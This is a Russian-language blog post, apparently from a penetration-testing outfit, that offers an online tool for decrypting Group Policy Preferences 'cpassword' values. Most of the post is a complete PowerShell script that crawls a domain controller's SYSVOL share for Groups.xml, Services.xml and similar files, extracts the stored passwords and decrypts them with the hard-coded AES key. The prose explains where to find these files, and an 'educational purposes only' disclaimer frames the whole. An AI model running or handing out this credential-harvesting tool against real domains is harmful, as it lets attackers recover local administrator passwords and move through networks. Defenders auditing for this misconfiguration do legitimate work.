Дисклеймер: Только в образовательных целях!
В продолжении серии статей-удобняшек онлайн сервисов для оперативного решения задач, например сервис подбора паролей на Cisco
Многие из Вас слышали при пентесте/аудите ИБ про такую ошибку админов как распространение пароля локального пользователя через групповые политики.
Кому-то возможно даже повезло на практике это проэксплуатировать, от себя добавим, что в 3 из 5 случаев это встречается на практике.
Мы немного погуглили и не найдя онлайн сервиса по расшифровке данного хэша одной кнопкой решили сделать это для Вас!)
Чтобы найти файл содержащий данный хэш на контроллере домена, достаточно открыть путь \\Имя домена\SysVol и выполнить поиск xml-файла, содержащего строку «cpassword=».
Нас интересуют файлы Groups.xml, в одном из них Вы скорее всего найдёте хэш пароля локального пользователя.
Для расшифровки пароля локального пользователя(чаще всего локального администратора) введите хэш пароля в поле:
Param ( [ValidateNotNullOrEmpty()] [String] $Server = $Env:USERDNSDOMAIN )
#Some XML issues between versions
Set-StrictMode -Version 2
#define helper function that decodes and decrypts password
function Get-DecryptedCpassword {
[CmdletBinding()]
Param (
[string] $Cpassword
)
try {
#Append appropriate padding based on string length
$Mod = ($Cpassword.length % 4)
switch ($Mod) {
‘1’ {$Cpassword = $Cpassword.Substring(0,$Cpassword.Length -1)}
‘2’ {$Cpassword += (‘=’ * (4 — $Mod))}
‘3’ {$Cpassword += (‘=’ * (4 — $Mod))}
}
$Base64Decoded = [Convert]::FromBase64String($Cpassword)
#Create a new AES .NET Crypto Object
$AesObject = New-Object System.Security.Cryptography.AesCryptoServiceProvider
[Byte[]] $AesKey = @(0x4e,0x99,0x06,0xe8,0xfc,0xb6,0x6c,0xc9,0xfa,0xf4,0x93,0x10,0x62,0x0f,0xfe,0xe8,
0xf4,0x96,0xe8,0x06,0xcc,0x05,0x79,0x90,0x20,0x9b,0x09,0xa4,0x33,0xb6,0x6c,0x1b)
#Set IV to all nulls to prevent dynamic generation of IV value
$AesIV = New-Object Byte[]($AesObject.IV.Length)
$AesObject.IV = $AesIV
$AesObject.Key = $AesKey
$DecryptorObject = $AesObject.CreateDecryptor()
[Byte[]] $OutBlock = $DecryptorObject.TransformFinalBlock($Base64Decoded, 0, $Base64Decoded.length)
return [System.Text.UnicodeEncoding]::Unicode.GetString($OutBlock)
}
catch {Write-Error $Error[0]}
}
#define helper function to parse fields from xml files
function Get-GPPInnerFields {
[CmdletBinding()]
Param (
$File
)
try {
$Filename = Split-Path $File -Leaf
[xml] $Xml = Get-Content ($File)
#declare empty arrays
$Cpassword = @()
$UserName = @()
$NewName = @()
$Changed = @()
$Password = @()
#check for password field
if ($Xml.innerxml -like «*cpassword*»){
Write-Verbose «Potential password in $File»
switch ($Filename) {
‘Groups.xml’ {
$Cpassword += , $Xml | Select-Xml «/Groups/User/Properties/@cpassword» | Select-Object -Expand Node | ForEach-Object {$_.Value}
$UserName += , $Xml | Select-Xml «/Groups/User/Properties/@userName» | Select-Object -Expand Node | ForEach-Object {$_.Value}
$NewName += , $Xml | Select-Xml «/Groups/User/Properties/@newName» | Select-Object -Expand Node | ForEach-Object {$_.Value}
$Changed += , $Xml | Select-Xml «/Groups/User/@changed» | Select-Object -Expand Node | ForEach-Object {$_.Value}
}
‘Services.xml’ {
$Cpassword += , $Xml | Select-Xml «/NTServices/NTService/Properties/@cpassword» | Select-Object -Expand Node | ForEach-Object {$_.Value}
$UserName += , $Xml | Select-Xml «/NTServices/NTService/Properties/@accountName» | Select-Object -Expand Node | ForEach-Object {$_.Value}
$Changed += , $Xml | Select-Xml «/NTServices/NTService/@changed» | Select-Object -Expand Node | ForEach-Object {$_.Value}
}
‘Scheduledtasks.xml’ {
$Cpassword += , $Xml | Select-Xml «/ScheduledTasks/Task/Properties/@cpassword» | Select-Object -Expand Node | ForEach-Object {$_.Value}
$UserName += , $Xml | Select-Xml «/ScheduledTasks/Task/Properties/@runAs» | Select-Object -Expand Node | ForEach-Object {$_.Value}
$Changed += , $Xml | Select-Xml «/ScheduledTasks/Task/@changed» | Select-Object -Expand Node | ForEach-Object {$_.Value}
}
‘DataSources.xml’ {
$Cpassword += , $Xml | Select-Xml «/DataSources/DataSource/Properties/@cpassword» | Select-Object -Expand Node | ForEach-Object {$_.Value}
$UserName += , $Xml | Select-Xml «/DataSources/DataSource/Properties/@username» | Select-Object -Expand Node | ForEach-Object {$_.Value}
$Changed += , $Xml | Select-Xml «/DataSources/DataSource/@changed» | Select-Object -Expand Node | ForEach-Object {$_.Value}
}
‘Printers.xml’ {
$Cpassword += , $Xml | Select-Xml «/Printers/SharedPrinter/Properties/@cpassword» | Select-Object -Expand Node | ForEach-Object {$_.Value}
$UserName += , $Xml | Select-Xml «/Printers/SharedPrinter/Properties/@username» | Select-Object -Expand Node | ForEach-Object {$_.Value}
$Changed += , $Xml | Select-Xml «/Printers/SharedPrinter/@changed» | Select-Object -Expand Node | ForEach-Object {$_.Value}
}
‘Drives.xml’ {
$Cpassword += , $Xml | Select-Xml «/Drives/Drive/Properties/@cpassword» | Select-Object -Expand Node | ForEach-Object {$_.Value}
$UserName += , $Xml | Select-Xml «/Drives/Drive/Properties/@username» | Select-Object -Expand Node | ForEach-Object {$_.Value}
$Changed += , $Xml | Select-Xml «/Drives/Drive/@changed» | Select-Object -Expand Node | ForEach-Object {$_.Value}
}
}
}
foreach ($Pass in $Cpassword) {
Write-Verbose «Decrypting $Pass»
$DecryptedPassword = Get-DecryptedCpassword $Pass
Write-Verbose «Decrypted a password of $DecryptedPassword»
#append any new passwords to array
$Password += , $DecryptedPassword
}
#put [BLANK] in variables
if (!($Password)) {$Password = ‘[BLANK]’}
if (!($UserName)) {$UserName = ‘[BLANK]’}
if (!($Changed)) {$Changed = ‘[BLANK]’}
if (!($NewName)) {$NewName = ‘[BLANK]’}
#Create custom object to output results
$ObjectProperties = @{‘Passwords’ = $Password;
‘UserNames’ = $UserName;
‘Changed’ = $Changed;
‘NewName’ = $NewName;
‘File’ = $File}
$ResultsObject = New-Object -TypeName PSObject -Property $ObjectProperties
Write-Verbose «The password is between {} and may be more than one value.»
if ($ResultsObject) {Return $ResultsObject}
}
catch {Write-Error $Error[0]}
}
try {
#ensure that machine is domain joined and script is running as a domain account
if ( ( ((Get-WmiObject Win32_ComputerSystem).partofdomain) -eq $False ) -or ( -not $Env:USERDNSDOMAIN ) ) {
throw ‘Machine is not a domain member or User is not a member of the domain.’
}
#discover potential files containing passwords ; not complaining in case of denied access to a directory
Write-Verbose «Searching \\$Server\SYSVOL. This could take a while.»
$XMlFiles = Get-ChildItem -Path «\\$Server\SYSVOL» -Recurse -ErrorAction SilentlyContinue -Include ‘Groups.xml’,’Services.xml’,’Scheduledtasks.xml’,’DataSources.xml’,’Printers.xml’,’Drives.xml’
if ( -not $XMlFiles ) {throw ‘No preference files found.’}
Write-Verbose «Found $($XMLFiles | Measure-Object | Select-Object -ExpandProperty Count) files that could contain passwords.»
foreach ($File in $XMLFiles) {
$Result = (Get-GppInnerFields $File.Fullname)
Write-Output $Result
}
}
catch {Write-Error $Error[0]}
Надеюсь Вам понравится данный сервис.